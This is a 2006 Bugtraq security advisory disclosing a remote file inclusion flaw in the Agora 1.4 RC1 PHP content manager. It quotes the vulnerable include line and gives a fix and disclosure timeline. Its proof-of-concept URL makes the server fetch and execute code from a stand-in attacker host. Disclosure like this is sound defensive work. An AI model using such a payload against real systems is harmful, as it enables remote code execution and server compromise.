[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [ECHO_ADV_59_2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]"
From: erdc () echo ! or ! id
Date: 2006-11-06 4:10:20
Message-ID: 20061106041020.31986.qmail () securityfocus ! com
[Download RAW message or body]
-----------------------------------------------------------------------------------------------
[ECHO_ADV_59$2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion \
Vulnerability
-----------------------------------------------------------------------------------------------
Author : Dedi Dwianto a.k.a the_day
Date Found : November, 01nd 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv59-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Agora
version : 1.4 RC1
URL : http://www.agora.gouv.fr
Based on the free software Spip, Agora is a free software of management of contents \
for Internet developed in php, which makes it possible to put in place and to manage \
quickly and with lower cost of the Internet sites, Intranet or extranet.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
--------------------------modules/Mysqlfinder/MysqlfinderAdmin.php----------
....
<?
include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")
...
----------------------------------------------------------
Input passed to the "$_SESSION["PATH_COMPOSANT"]" parameter in Mysqlfinder.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.
Proof Of Concept:
~~~~~~~~~~~~~~~
http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt?
Solution:
~~~~~~~
- Insert new line code :
...
include_once 'MysqlfinderParam.inc';
...
Before include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")
- Turn off register_globals
- Turn off display_error to Hide Full Path Error
Timeline :
~~~~~~~~~
01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure
---------------------------------------------------------------------------
Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id
-------------------------------- [ EOF ]----------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic